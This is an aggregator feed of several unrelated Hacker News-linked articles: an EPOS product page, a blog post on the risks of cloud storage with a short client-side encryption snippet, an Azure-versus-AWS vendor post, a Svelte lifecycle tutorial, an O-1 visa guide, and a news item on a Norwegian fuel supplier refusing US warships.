    • 99.9% Uptime – Keep operations running smoothly, no interruptions.
    • Sell Anywhere, Anytime – Manage in-store, online, and mobile sales effortlessly.
    • Built for Your Industry – Retail, hospitality, ticketing, and more—POSimple adapts to you.

    Smarter EPOS. Seamless Transactions. Unmatched Reliability.

    POSimple, where simplicity meets performance.

    Designed for retail, hospitality, and multi-location businesses, our customizable, cloud-based EPOS system ensures effortless sales, compliance, and business growth—all with transparent, affordable pricing.

    Powerful Features, Simple Execution - Fast, Flexible & Secure EPOS, Sell In-Store, Online & Across Locations

    An All-in-One or Customizable EPOS System that Scales with You

    POSimple is designed to simplify operations, enhance efficiency, and drive business growth. Whether you need an out-of-the-box solution or a fully customizable system, POSimple adapts to your business needs, giving you complete control.

    Integrated Payments

    Accept contactless, chip & pin, and mobile payments with transparent, low transaction fees.

    Live Sales & Inventory Tracking

    Gain real-time insights into stock levels and sales performance.

    Cloud-Based Multi-Location Management

    Monitor and manage operations across multiple sites with ease.

    A powerful, scalable, and future-ready EPOS system that works for you.

    Compliance & Security – Built In

    POSimple ensures businesses meet industry regulations with built-in compliance tools.

    Fiscal Compliance for Regulated Markets

    POSimple is compliant with fiscal regulations in Germany, France, Italy, and other countries requiring fiscal controls—unlike many competitors that cannot operate in these regions.

    Age Verification & ID Check

    Fully integrated compliance solutions for vape shops, liquor stores, and other age-restricted sales.

    Food Labeling & Allergen Compliance

    Meets Natasha’s Law requirements, providing built-in allergen and ingredient labeling tools for food businesses.

    Why POSimple?

    Sell Anywhere with Omnichannel EPOS

    POSimple unifies your business across multiple channels, ensuring seamless operations for in-store, online, and mobile sales.

    • All-in-One EPOS Solution – Handle sales, payments, inventory, and compliance with ease.
    • Scalable & Customizable – Adapt POSimple to your business, from single shops to multi-site franchises.
    • Remote & Cloud-Based Management – Control operations from anywhere, on any device.
    • Sell Anywhere on/offline using handheld devices and tablets
    • No Hidden Costs – One affordable pricing model with transparent billing.

    Seamlessly connect your business across multiple sites and sales channels in the most remote locations on or offline.

    How POSimple Stands Above the Rest

Feature | POSimple EPOS | Other EPOS Systems
Instant Setup | Sell in minutes—no complex setup | Lengthy onboarding & setup required
Works on legacy hardware | Compatible with existing hardware* | Requires expensive hardware upgrades
Transparent Pricing | One simple price, no contracts | Hidden fees & expensive add-ons
Simple & Intuitive | ✅ Simple user interface | Complicated staff training
Regulatory Compliance | Fiscal, ID, & allergen compliance built-in | Requires third-party integrations

    POSimple: The Best EPOS Solution for Your Business

    • Best EPOS system for retail stores
    • Cloud-based EPOS for small businesses
    • Mobile POS system for hospitality & ticketing
    • Affordable, scalable EPOS with real-time insights
    • EPOS system with inventory management & AI analytics
    • How to choose the right EPOS system for your business
    • Integrated EPOS for omnichannel sales & retail
    • Customizable, industry-specific POS software

    Get Started Today

    Stop juggling multiple systems. Take control with POSimple, the all-in-one POS solution designed to grow with your business. With POSimple, you'll simplify operations, cut costs, and achieve more, all while enjoying unparalleled support and reliability.

    FAQ's

    • Can I use POSimple with my existing hardware?

      Yes! POSimple works with most existing POS hardware, reducing upgrade costs.

    • Is POSimple suitable for multi-location businesses?

      Absolutely! Our cloud-based system ensures seamless multi-location management and real-time syncing.

    • Does POSimple include compliance features?

  Yes. POSimple meets fiscal regulations, includes built-in manual or automated age verification, supports food allergen labeling, and complies with employee tip legislation.

    • How much does POSimple cost?

  We offer transparent pricing with no hidden fees. Contact us for a tailored quote; we can help you invest in new hardware or recycle your existing equipment.

    • Can I try POSimple before committing?

  Yes! Sign up for a free demo to experience the system before making a decision. We also offer a 14-day refund on any new system, provided all materials and packaging are in A1 condition for resale.

    • Does POSimple link with any Accounting systems

  POSimple links with Xero accounting, and integrations with FreeAgent and QuickBooks are in progress.

    Local Support by
    Local businesses

    POSimple is creating a nationwide network of resellers to provide local support to their local businesses. Support and service is better served with tea and biscuits than endless hours on the phone. Platinum grade service because local businesses matter!

    If you are a local EPOS provider please get in touch

    Head Office

    Ancrum North Lodge
Jedburgh, United Kingdom

    Let’s Talk


    ]]>
    https://posimple.net/index.php hacker-news-small-sites-43225019 Sat, 01 Mar 2025 23:14:18 GMT
    <![CDATA[Infrastructural problems and instabilities caused by cloud services]]> thread link) | @todsacerdoti
    March 1, 2025 | https://mental-reverb.com/blog.php?id=15 | archive.org

    Introduction

I see more and more cloud-based services being used, and increasingly, both private users and companies depend on these services. While the cloud can provide a great deal of value and save you precious time, it also poses risks to your infrastructure that should not be underestimated. I would like to share some concerns and advice about these services, especially when it comes to the storage of private data. I recommend avoiding cloud services like OneDrive and Dropbox, as well as services that primarily store user data such as Facebook, Skype, or Gmail, for any data you care about. At least back up all your data locally on drives you own and download all the content you want to keep. The transition away from these services may be slow and tedious, but their continued usage comes at a cost too large to be ignored.

    Definitions

    I consider services like Facebook, Skype and Gmail cloud services too, though depending on the definition of a cloud service, this may be debatable. Data that is inside these systems is in the cloud for all intents and purposes. It is certainly stored on remote servers and at most partially cached on your local computer. Large parts of your data are out of your direct reach, and that is where I'd like to draw the line for the remainder of this post.

    Lack of ownership

Data that is not on a storage medium you own is not your data. It might look like you own it when you browse your cloud storage, but all of it can be gone in the blink of an eye and you have no control over it whatsoever. If a cloud provider is in financial straits, it is likely that they will have to pull the plug before everyone has downloaded their data. Conversely, files that you "permanently" deleted from the cloud may continue to exist invisibly, sometimes forever, making it impossible for you to truly erase files. The interface is often opaque and hides what is actually being done with your data. The control is not with you, the user. With local hard disks and a basic backup strategy, you have none of these problems and you have full control over your data.

    The cloud provider can also delete or replace your files for whatever reasons they see fit. For example, a music service may replace one recording of a song with another and you cannot restore the original version anymore, even if you liked it more. Maybe they replace a version that contains swear words with a censored one. This action could be caused by a cultural shift. Imagine that the books inside your bookshelves rewrite themselves or disappear depending on prevailing views and values in a society, a government or the company that hosts the data. Maybe you don't even realize it because who knows the exact number of books they own, and what exactly is in them line for line? In the digital world, the unthinkable practice of sneakily changing or removing what is written is commonplace.

Another point is the rise of internet justice mobs, often on Twitter and similar toxic platforms, who try to ruin the lives of people who say unpopular or politically incorrect things. Campaigns by such mobs have led to the termination of a variety of private online accounts, like on Cloudflare and Google, due to the sheer pressure of online discourse and media. Imagine losing all your emails, calendar entries, YouTube videos and your Android login due to a sudden Google account closure. This is a scenario that has actually happened more than once, and it is in no way guaranteed that a closed account will be restored.

So it is entirely possible that a cloud provider will decide to lock you out for arbitrary reasons, and the right to do so is almost always explicitly reserved in their terms and conditions, so there is no way to challenge this decision because you agreed to it up front. The cloud provider will certainly lock your account if ordered to do so by the authorities.

Even if nobody was ordered or pressured into closing your account, modern platforms are governed by algorithms that screen your content and take it down or outright ban you if a violation is detected. Unfortunately, content-curating AI is in its embryonic stages and it is not known when and if it will ever work properly. The algorithms suffer from a myriad of problems like false positives and are abused by malicious people who want to shut down accounts by flagging content that does not violate the guidelines. Companies like Google have largely replaced human tech support with these algorithms, which means that it is almost impossible to get someone to help you once the algorithms fail.

All these factors lead to an increased risk of data loss and denial of service, and it can be very difficult and tedious to replace the infrastructure whose access you just lost. You do not own your data if you do not own the hardware; it is as simple as that.

    Data on the cloud may also not belong to you in another way: Some online platforms make you give up some or all of your rights to your intellectual property. They may also make you give them special permissions about the usage, modification and redistribution of your content. With these legal measures, the platform is able to gain power over you by controlling your content. If your daily income is dependent on an online platform, you are forced to create content that abides by their guidelines (whose enforcement is often quite arbitrary), which means that the platform is now dictating what you can say or do.

    Lack of reliability

    It may sound strange, but hosting your own solution is often more reliable than cloud services. At first, this sounds counterintuitive: "Can't the professionals do better than I?" That is most likely the case, but the crux is, the professionals who look after cloud services solve a different problem. While you manage a Raspberry Pi, a NAS box or a mini desktop, they regularly shuffle around petabytes of data. They are mainly concerned with hard disk replacements, energy consumption, cooling and load balancing. They serve millions if not billions of users every day. If you don't get your data, but the rest of the world does, they call that a successful day because that is an amazing quality of service, statistically speaking. They can schedule downtimes at times that are inconvenient for you. You may encounter performance or connectivity problems and you have no clue whose machine is at fault - often, official communication is insufficient or non-existent even during severe outages and tech support is left in the dark too, if they are reachable at all. Generally, if something breaks, you are helpless.

Since servers and data lines are shared between many users, performance drops during periods of high activity are the rule rather than the exception. This mode of operation is called statistical multiplexing and allows a service to be very cheap, but it only runs stably under the assumption that a limited, small percentage of customers uses the service at the same time. For example, an ISP can sell a hundred 100 Mbit/s connections over a single 1 Gbit/s uplink, and everything works until more than ten percent of the customers transmit at full speed simultaneously. During periods of high activity, nobody is guaranteed to receive the service, and if they do, the performance is often abysmal. Almost all private internet connections are served with statistical multiplexing, but at least your CPU and the rest of your hardware is not shared like that with strangers if you self-host, leading to a more predictable quality of service.

    Lack of privacy

    If you upload unencrypted data, your cloud provider can see everything. They can search through, analyse and index your data. They could even sell information about it to advertisers. Special care has to be taken when it comes to privacy policies, especially since a lot of companies just change their privacy policy with reluctant and barely existing efforts to affirm your consent, which is illegal but almost always goes unpunished. This is a convenient way to smuggle dangerous clauses into privacy policies, though usually nobody reads them anyway. And even if the privacy policy was violated, the enforcement is often lacklustre at best - if the violation was even found out within a reasonable time frame. I won't go into mass surveillance by governments, the implications of the Snowden revelations should be clear to everyone. To put it bluntly, with unencrypted cloud storage, you cannot expect any privacy whatsoever, and it would be foolish to do so.

To protect your privacy, you should always fully encrypt your data with a state-of-the-art encryption scheme. I recommend something like AES-256, which is widely believed to be secure as of the year 2018 and is well supported across the board. However, beware: cloud providers often advertise that they support full cloud storage encryption, but what they do not like to tell you is that they themselves hold the key. This is almost like uploading plain unencrypted data. No privacy has been gained whatsoever - your cloud storage provider can still peek into all your data at all times. You need to encrypt your data with a key you and only you hold. A term that is often used in this context is end-to-end encryption (E2EE). What this means is that the data stays securely encrypted throughout the entire path it takes, and only the endpoints (in this case, only your own computers are endpoints, not the cloud provider's) can decrypt the data. End-to-end encryption is the gold standard for privacy and highly recommended for digital communication and storage of data.
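
To make this concrete, here is a minimal sketch of client-side encryption before upload (my illustration, using Python's third-party cryptography package; install it with pip install cryptography):

    # Minimal sketch: encrypt locally with AES-256-GCM before uploading,
    # with a key that only you hold. Illustration only; manage the key
    # and nonces carefully in a real setup.
    import os
    from cryptography.hazmat.primitives.ciphers.aead import AESGCM

    key = AESGCM.generate_key(bit_length=256)  # store this offline, never in the cloud

    def encrypt_for_upload(plaintext: bytes) -> bytes:
        nonce = os.urandom(12)  # must be unique per encryption
        ciphertext = AESGCM(key).encrypt(nonce, plaintext, None)
        return nonce + ciphertext  # prepend nonce so decryption is possible later

    def decrypt_after_download(blob: bytes) -> bytes:
        nonce, ciphertext = blob[:12], blob[12:]
        return AESGCM(key).decrypt(nonce, ciphertext, None)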

    Cloud providers do not like fully encrypted data to which they hold no key. This has various reasons. When they can inspect and index your data, they may be able to improve cloud performance and implement handy features like previews and text search. Mail providers can filter spam much more effectively if they can inspect your communications. There may also be legal reasons that compel cloud providers to reject end-to-end encryption. In the worst case, they don't like end-to-end encryption because they sell information about you to advertisers or other third parties. Intelligence agencies also hate strong end-to-end encryption because it is a major obstacle to mass surveillance. In general, encrypted data to which only you hold the key disempowers the cloud provider and other third parties and empowers you, the user and owner of the data, though it might come at a cost of diminished convenience.

    Insufficient time horizon

    With an average life expectancy between 70 and 84 years in large parts of the world, that means the time horizon for a young person to store their personal data is around half a century or more. Half a century translates to an eternity in the very young cloud industry. The unstable nature of companies, services, software, data formats and also digital law doesn't lend itself to such time horizons. A properly set up Linux box needs absolutely minimal maintenance and updates to stay in shape. Nobody deletes your data, shoves breaking updates into your face or has random outages due to problems that can only occur at enormous data centres. It also frees you from any vendor lock-in and provides good compatibility to computers of most brands.

    Needless internet dependency

    Many services don't really need the internet. Some services only need an internet connection infrequently and offline work is mostly possible. Moving such services entirely to the cloud creates a needless internet dependency where none is needed. New points of failure are introduced. These services should be deployed on premise, internally on LAN. As a side-effect, both your privacy and security are greatly enhanced, and so is your data transfer rate. Even locally deployed services can later be hooked up to the internet if need be.

    Conclusion

    Cloud services can be powerful tools. However, for the privacy aware user who is above all interested in a long-term, robust and minimalist solution and who values freedom and ownership of their data, local solutions are superior. The most important thing is data redundancy and avoiding (over-)reliance on single services. I don't expect everyone to run their own mail server now because that's a difficult thing to do. There are applications where the benefits of the cloud outweigh the risks. I just want to warn you about the implicit and often hidden costs of cloud services and the instabilities they can introduce to your life. I don't want anyone to be surprised when they are let down by their cloud service and they can't do anything about it. Keep your data as local as possible and as remote as necessary. Don't go for the cloud without having good reasons for it.

    ]]>
    https://mental-reverb.com/blog.php?id=15 hacker-news-small-sites-43224982 Sat, 01 Mar 2025 23:11:43 GMT
    <![CDATA[Why Microsoft Azure Shines as a 5-Star Cloud (While AWS Lags at 3 Stars)]]> thread link) | @jiripik
    March 1, 2025 | https://rocketedge.com/2025/02/27/why-microsoft-azure-shines-as-a-5-star-cloud-while-aws-lags-at-3-stars/ | archive.org

    At RocketEdge.com, our primary objective is to unlock maximum long-term value for our clients in the finance sector. Often, what drives that value is not merely the technology platform, but the time and productivity of the experts using it. While both Microsoft Azure (Azure) and Amazon Web Services (AWS) have shaped the evolution of cloud computing, the reality is that Azure’s architecture is strategically built to value human time and ensure a seamless, high-productivity environment—worthy of a 5-star rating. In contrast, AWS, with its intricate, sometimes clumsy approach, offers a mere 3-star experience.

    Below, we explore why Azure consistently outperforms AWS in delivering a superior combination of productivity, ease of use, architectural soundness, and trustworthiness.

    1. Putting a Premium on Time: The 5-Star Hotel Analogy

    Picture yourself in a 3-star hotel versus a 5-star hotel. A 3-star might tick the basics: a bed, a bathroom, perhaps a breakfast buffet. But a 5-star hotel is a different world—every detail is orchestrated to maximize your comfort, anticipate your needs, and preserve your valuable time. Even if the 5-star costs a bit more up front, you gain far greater value through efficiency, service, and overall experience.

    Azure is much like the 5-star hotel. Its feature set, integrations, and user experience are designed so you can “check in” quickly and start building without wrestling with complex manual configurations. AWS, on the other hand, often makes you spend more time on menial tasks—akin to assembling your own furniture in your hotel room. That time cost usually outweighs any minor price difference in raw compute or storage.

    Microsoft has a decades-long track record of developing best-in-class software development tools. From Visual Studio to VS Code to GitHub and GitHub Copilot, Azure naturally extends these ecosystems, letting organizations build, test, and deploy with minimal friction. By contrast, AWS tends to offload tool integration onto the user, requiring cumbersome manual steps or third-party solutions.

    1. Azure DevOps & Integration
      • One-click Infrastructure as Code: Azure Resource Manager allows you to generate templates for any resource group with a single button, accelerating DevOps adoption.
    2. AWS Complexity
      • Manual Infrastructure as Code: Although AWS has CloudFormation, not all services support it, and it often requires more custom scripting and specialized knowledge.

    3. Architectural Thoughtfulness: Eleven Illustrative Examples

    At a high level, Azure’s services are more comprehensively and cohesively built, saving you time on essential tasks in virtually every single cloud service. Representative examples:

    1. Automatic Clean-Up of Failed Uploads
  • Azure Blob Storage discards incomplete parts automatically. In AWS S3, you must configure lifecycle rules yourself, wasting mental bandwidth and risking storage bloat (see the sketch after this list).
    2. Built-In Cost Caps
      • Azure allows you to set hard stops when budgets are exceeded, an invaluable feature for startups. AWS provides no out-of-the-box mechanism—you’d need to build a custom Lambda with intricate IAM policies.
    3. One-Stop Replication
      • Azure enables straightforward cross-region blob replication. In AWS, duplicating S3 objects across regions often requires multiple configurations.
    4. Cheaper Windows & Spot Instances
      • Azure spot instances are not only cheaper but also exhibit more stable pricing than AWS equivalents.
    5. Better Connectivity & Global Performance
      • Azure optimizes data routes so that an upload from Singapore to a US-based Azure region can be nearly instantaneous. With AWS S3 in us-east-1, the same operation can take significantly longer—sometimes hours.
    6. Superior Cost Reporting
      • Azure offers detailed cost dashboards that can be automatically emailed on a schedule. AWS has billing dashboards but lacks similarly seamless reporting.
    7. Complimentary Desktop Tools
      • Azure provides Storage Explorer for easy file uploads to blob storage out of the box. AWS expects you to find, vet, and install third-party tools for S3.
    8. Stable Spot Pricing
      • Azure’s spot instances exhibit less volatile pricing. Entire third-party businesses revolve around predicting AWS’s erratic spot instance fluctuations.
    9. Built-In SFTP Access
      • Azure Blob Storage enables SFTP with just a checkbox. AWS requires standing up a separate AWS Transfer Family environment, adding complexity and cost.
    10. Straightforward Function Scheduling
      • A one-line code entry in Azure vs. a separate AWS service (EventBridge) for scheduling tasks.
    11. Instant Infrastructure-as-Code Templates
      • With Azure Resource Manager, you can auto-generate a deployment script for any resource group, streamlining DevOps while AWS requires more complex CloudFormation or Terraform setups.
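
To illustrate the kind of manual configuration AWS pushes onto the user in example 1, here is a minimal boto3 sketch (my illustration; the bucket name is hypothetical) of the lifecycle rule you would have to set up yourself to abort incomplete multipart uploads:

    # Minimal sketch: the lifecycle rule AWS users must configure
    # themselves to clean up incomplete multipart uploads.
    import boto3

    s3 = boto3.client("s3")
    s3.put_bucket_lifecycle_configuration(
        Bucket="my-example-bucket",  # hypothetical bucket name
        LifecycleConfiguration={
            "Rules": [
                {
                    "ID": "abort-incomplete-multipart-uploads",
                    "Status": "Enabled",
                    "Filter": {"Prefix": ""},  # apply to the whole bucket
                    "AbortIncompleteMultipartUpload": {"DaysAfterInitiation": 7},
                }
            ]
        },
    )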

    4. Trust and Transparency

    Beyond technical capability, trust is vital in the financial industry. Several AWS public announcements have been flagged as misleading or lacking clarity—such as the claim that free credits have “no intrinsic value,” or questionable “customer obsession” rhetoric. In contrast, Microsoft’s communication and support structures, especially under Azure, have a stronger reputation for transparency and reliability.

    This is especially important when dealing with high-stakes financial services. Handling sensitive data or mission-critical workloads requires a provider with a credible track record of security, compliance, and consistent support.

    AWS encourages a “builders’ mindset,” which can be great for highly specialized projects with unique requirements. But more often in finance, the goal is to deploy robust, compliant solutions quickly—without manually piecing together integrations or rewriting code for tasks that should be automated.

    When your organization’s time is your highest expense, an environment that requires additional configuration and fosters unproductive tinkering can become very costly. Azure’s streamlined approach cuts down the operational friction, letting engineering teams focus on business logic rather than spending hours writing unplanned glue code or dealing with orphaned S3 parts.

    6. Conclusion: Maximizing Long-Term Value with Azure

    At RocketEdge.com, we measure success by the long-term value we deliver to clients. The cost of raw compute, storage, or data transfer often pales in comparison to the cost of human labor. Therefore, any environment that saves an organization time—whether through automation, cohesive design, or built-in tools—directly impacts the bottom line.

    Microsoft Azure is architected to be your 5-star experience in the cloud, offering thoughtful design, powerful integrations, predictable pricing, and trustworthy communication. AWS may still serve certain niche needs or satisfy those who prefer to assemble everything themselves. But if your business depends on productivity, efficient collaboration, and robust scaling—especially in the finance industry—Azure stands out as the clear winner.

    Ready to transform your finance workloads with a truly 5-star experience?
    Our experts at RocketEdge.com can help you maximize your cloud investments, whether you’re already on Azure or considering a strategic move from AWS. Because we believe the greatest value comes from saving time, reducing complexity, and delivering solutions that truly empower your business.

    As the French saying goes, “Le diable est dans les détails”—the devil is in the detail. By focusing on the right details, Azure ensures you’re building in a world-class environment that actually earns its stars.

    • Jiri Pik

    ]]>
    https://rocketedge.com/2025/02/27/why-microsoft-azure-shines-as-a-5-star-cloud-while-aws-lags-at-3-stars/ hacker-news-small-sites-43224962 Sat, 01 Mar 2025 23:10:21 GMT
    <![CDATA[Understanding Svelte Component Lifecycle and Reactivity]]> thread link) | @hamdouni
    March 1, 2025 | https://barim.us/post/2025-03-01-svelte-component-lifecycle-reactivity/ | archive.org

    Saturday, March 1, 2025 · 3 minutes · 610 words

    Svelte’s component system features a specific approach to reactivity and component initialization. This article explores a common misconception about how props, variables, and component initialization work in Svelte.

    The Misconception

Developers new to Svelte might assume that when a prop changes, the entire component script runs again, as if the component were a function and the prop a parameter: if the prop changes, the function returns a different result, right? This isn't how Svelte operates, and understanding this distinction is important for building functional applications.

    Analyzing the Example

    The example demonstrates this concept with two components:

    1. app.svelte: A parent component with buttons to select different names
    2. name.svelte: A child component that receives a name prop and tracks modifications

    The Parent Component (app.svelte)

    <script>
        // This shows that changing the prop does not rerun the component
        // script.
    	
        import InputName from "./name.svelte";
        let names = ["John", "Mila", "Ali"];	
        let selected = $state();
    </script>
    
    <!-- This selector trigger the prop change in child component -->
    {#each names as name}
        <button onclick={() => selected=name}>{name}</button>
    {/each}
    
    <!-- This section call the child component with the prop -->
    {#if selected}
        <InputName name={selected}/>
    {/if}
    

    The parent component:

    • Maintains a list of names and a selected name state
    • Renders buttons for each name that update the selected variable
    • Also renders the InputName component with the selected name

    The Child Component (name.svelte)

    <script>
        // This is a simple component that implements change detection
    	
        let { name } = $props();
    	
        // this is executed only once at component mount
        let original = name;
    
        let changed = $derived(original != name);
    </script>
    
    Name : <input type="text" bind:value={name}>
    
    {#if changed}
        modified
    {/if}
    

    The child component:

    • Receives a name prop using $props()
    • Stores the initial value in an original variable
    • Uses $derived to create a reactive changed variable that compares current and original values
    • Displays “modified” when the input value differs from the original

    The Problem

    When we click on a name and start updating the field, it shows the ‘modified’ indicator. This appears to work correctly.

    However, when we click on another name, the indicator remains visible. We can also trigger this issue by clicking on the first name without modifying it, then clicking a second name: the ‘modified’ indicator appears despite not updating anything.

    The key insight is that the component’s script block runs only once when the component is initially mounted. When props change, Svelte updates the reactive dependencies without re-running the entire script.

    This means that let original = name; is executed only once during component initialization. When the name prop changes later:

    1. The name value updates
    2. The changed derived value recalculates
    3. But the variable original still holds the first value it received

    The Solution

    To force the child component to re-execute its script when the name prop changes, we use a {#key} block in the parent component.

The {#key var} block reacts to updates of var by destroying and recreating the components it surrounds.

    For our example, we need to modify our code like this:

    <!-- This section call the child component with the prop -->
    {#if selected}
        {#key selected}
            <InputName name={selected}/>
        {/key}
    {/if}
    

    When selected changes:

    • Without {#key}, the same component instance would remain and the variable original would never update
    • With {#key}, Svelte destroys and recreates the InputName component, causing the script to run again and the variable original to be reset

    Conclusion

    1. Be aware of one-time initialization: Variables assigned directly in the script block are initialized only once.
    2. Use reactive declarations: Leverage $derived for values that need to react to prop changes.
    3. Understand when to use {#key}: Use it when you need to completely reset a component state, like in our example for change detection patterns.
    ]]>
    https://barim.us/post/2025-03-01-svelte-component-lifecycle-reactivity/ hacker-news-small-sites-43224817 Sat, 01 Mar 2025 22:57:34 GMT
    <![CDATA[The O-1 Visa: Your Gateway to the American Dream(If You're Extraordinary Enough)]]> thread link) | @AdamKizabi
    March 1, 2025 | https://green-card-priority-date.com/blog/o1-visa-extraordinary-visa | archive.org

    In the sprawling landscape of US immigration, there exists a golden ticket that bypasses many of the common frustrations and bottlenecks: the O-1 visa. Often whispered about in startup accelerators and tech campuses, this pathway has become legendary among the technically gifted - and for good reason.

    What Exactly Is This Mythical O-1?

    The O-1 visa is America's invitation to the world's extraordinary talent. Unlike the H-1B lottery (where your chances might be worse than getting your pull request accepted on a Friday afternoon), the O-1 specifically targets individuals with "extraordinary ability or achievement."

    The visa comes in two flavors:

    • O-1A: For those with extraordinary ability in sciences, education, business, or athletics
    • O-1B: For those in arts, motion pictures, or television

    For the HackerNews crowd, we're primarily talking about O-1A, though if you've created a viral tech YouTube channel or podcast, O-1B might be your lane.

    The "Extraordinary" Bar: Higher Than Your Stack Overflow Reputation

    When immigration officials say "extraordinary," they're not just talking about knowing how to exit Vim. The standard is genuinely high - you need to be in the top percentage of your field. But unlike academic visas that require PhDs, the O-1 recognizes different forms of excellence.

    You'll need to satisfy at least three of these criteria:

    • Received nationally or internationally recognized prizes/awards
    • Membership in associations that require outstanding achievement
    • Published material about you in professional publications
    • Judged the work of others in your field
    • Made original scientific, scholarly, or business contributions of major significance
    • Authored scholarly articles
    • Been employed in a critical capacity at distinguished organizations
    • Command a high salary

    Real Stories from the Trenches

    Let me share some real-world examples that might hit closer to home:

    Suhail Doshi, co-founder of Mixpanel, came to the US on an O-1 after Y Combinator. Despite dropping out of college, he demonstrated extraordinary ability through his technical innovations, the significant funding his startup attracted, and press coverage in major tech publications. His path wasn't traditional, but his impact was undeniable.

    Jane Manchun Wong became famous for reverse engineering apps to discover unreleased features. Her technical blog posts revealing upcoming features in Instagram, Facebook, and Twitter generated substantial media coverage and industry impact. This expertise and recognition helped her qualify for an O-1 visa without traditional credentials like multiple degrees or a long employment history.

    Andrew Ng, before becoming a household name in AI, used his research papers, conference presentations, and the impact of his work at Stanford to qualify for his visa. His ability to bridge academic research with practical applications made him a clear case for "extraordinary ability."

    The Nitty-Gritty Details: A Timeline of Pain and Paperwork

    Here's what the process actually looks like:

    Month 1: Preparation

    • Selecting an attorney ($500-1,000 for initial consultations)
    • Gathering evidence (countless hours of your life you'll never get back)
    • Identifying potential recommenders (prepare to call in every favor)

    Months 2-3: Building Your Case

    • Drafting and collecting recommendation letters (typically 5-10 letters)
    • Organizing evidence into a coherent narrative
    • Attorney fees for case preparation ($4,000-8,000)

    Month 4: Filing

    • USCIS filing fee: $460
    • Premium processing (optional, but who are we kidding?): $2,500
    • Attorney's final review and submission: $1,000-2,000

    Months 5-6: The Waiting Game

    • With premium processing: 15 calendar days
    • Without premium processing: 3-8 months of refreshing your email
    • Responding to Requests for Evidence (RFEs) if needed: Additional $1,000-3,000 in attorney fees

    Month 7: Victory (Hopefully)

    • Visa stamp at US consulate: $190
    • Travel costs to your home country if you're already in the US

Total timeline: 4-8 months. Total cost: $8,000-15,000.

    War Stories from the Field

    "I submitted my application right before a major conference where I was speaking," recalls Elena, a cryptography expert now working at a blockchain startup in San Francisco. "My attorney suggested we wait for the conference to strengthen my case, but I needed the visa quickly. The day after my talk, we received an RFE asking for more evidence of my recognition in the field. Ironically, my talk had gone viral overnight, giving us exactly what we needed to respond. Premium processing saved me here—I had my approval two weeks later."

    Then there's Raj, a backend engineer who contributed to Kubernetes: "I thought my GitHub contributions weren't enough since I wasn't a core maintainer. My attorney suggested we focus on the specific problem I solved that affected thousands of clusters. We got recommendation letters from three companies that benefited from my patch and an O-1 approval without any RFEs. The whole process took six months and cost around $9,000."

    Not all stories have happy endings, though. "My first O-1 application was denied," admits Marco, now a senior engineer at a FAANG company. "I relied too heavily on my employer's reputation and didn't sufficiently document my personal contributions. The second time, we gathered metrics showing how my optimizations reduced AWS costs by 40% and included before-and-after performance data. That concrete impact evidence made all the difference."

    Strategic Decisions That Make or Break Your Case

    The most successful applications share common elements:

    1. Quantify everything: "Improved system performance" is weak. "Reduced latency by 60% affecting 2 million daily users" is strong.

    2. Translation is crucial: Your attorney probably doesn't understand that your distributed consensus algorithm is revolutionary. Work with them to translate technical achievements into impact statements immigration officers can grasp.

    3. Press matters more than you think: That interview you did with a niche technical blog? Include it. The Reddit AMA where you explained your open source project? Evidence of recognition.

    4. Choose recommenders strategically: A letter from a famous professor who barely knows you is less valuable than one from a respected but less famous person who can speak specifically about your work.

    Why Tech People Love It

    Unlike the H-1B, there's no annual cap on O-1 visas. You're not entering a lottery where your odds decrease yearly. The O-1 also allows for a broader definition of professional activities - you can consult, work for multiple employers, or even run your own business.

    Many founders prefer it because they can maintain control of their companies without complex corporate structures needed for other visas. Plus, it's renewable indefinitely as long as you're working on projects requiring your extraordinary abilities.

    The Not-So-Great Parts

    It's not all serverless architecture and efficient algorithms:

    • The standard is genuinely high. Self-assessment is notoriously unreliable - many qualified people think they don't qualify, while many unqualified people think they do.
    • It's temporary. Unlike green cards, it doesn't lead directly to permanent residency.
    • It's tied to your specific extraordinary abilities. Pivoting careers can be complicated.
    • The evidence gathering is time-consuming. Think of it as documenting your entire codebase without any automated tools.

    Final Thoughts: Your Code Speaks Volumes

    The O-1 visa isn't just about what you've done - it's about the impact you've had. Your commits, pull requests, products, and technical decisions tell a story. With the right framing and evidence, that story could open the door to the largest tech economy in the world.

    Remember: in this process, you're not just a programmer, engineer, or data scientist. You're the extraordinary talent that America wants to attract. Now go assemble your evidence and prepare to argue why your technical achievements matter - not just to your team or company, but to your entire field.

    ]]>
    https://green-card-priority-date.com/blog/o1-visa-extraordinary-visa hacker-news-small-sites-43224564 Sat, 01 Mar 2025 22:38:44 GMT
    <![CDATA[Norwegian fuel supplier refuses U.S. warships over Ukraine]]> thread link) | @hjjkjhkj
    March 1, 2025 | https://ukdefencejournal.org.uk/norwegian-fuel-supplier-refuses-u-s-warships-over-ukraine/ | archive.org

    Norwegian fuel company Haltbakk Bunkers has announced it will cease supplying fuel to U.S. military forces in Norway and American ships docking in Norwegian ports, citing dissatisfaction with recent U.S. policy towards Ukraine.

    In a strongly worded statement, the company criticised a televised event involving U.S. President Donald Trump and Vice President J.D. Vance, referring to it as the “biggest shitshow ever presented live on TV.”

    Haltbakk Bunkers praised Ukrainian President Volodymyr Zelensky for his restraint, accusing the U.S. of “putting on a backstabbing TV show” and declaring that the spectacle “made us sick.”

    As a result, the company stated: “We have decided to immediately STOP as fuel provider to American forces in Norway and their ships calling Norwegian ports. No Fuel to Americans!” Haltbakk Bunkers also urged Norwegians and Europeans to follow their lead, concluding their statement with the slogan “Slava Ukraina” in support of Ukraine.

    Who is Haltbakk Bunkers?

    Haltbakk Bunkers is a Norwegian fuel supplier that provides marine fuel for shipping and military operations. Based in Kristiansund, Norway, the company specialises in bunkering services for vessels operating in Norwegian waters, offering fuel logistics and distribution for both civilian and military customers.

    Haltbakk Bunkers plays a significant role in Norway’s maritime industry, supplying fuel to vessels calling at Norwegian ports, including NATO and allied forces.

    The decision to cut off the U.S. military could have logistical implications for American naval operations in the region. Norway is a key NATO member and frequently hosts U.S. and allied forces for joint exercises and Arctic defence operations.

    This announcement raises questions about the broader European stance on U.S. policy towards Ukraine and whether other businesses or governments might take similar actions. It also highlights how private companies in Europe are responding independently to geopolitical developments.

    The U.S. has not yet responded to the decision, and it remains to be seen whether this will affect fuel supply chains for American forces operating in Norway and the North Atlantic region.



    ]]>
    https://ukdefencejournal.org.uk/norwegian-fuel-supplier-refuses-u-s-warships-over-ukraine/ hacker-news-small-sites-43223872 Sat, 01 Mar 2025 21:29:36 GMT
    <![CDATA[You Need to Blog More (Even If Nobody Reads It)]]> thread link) | @Igor_Wiwi
    March 1, 2025 | https://igorstechnoclub.com/why-you-need-to-blog-more-even-if-nobody-reads-it/ | archive.org

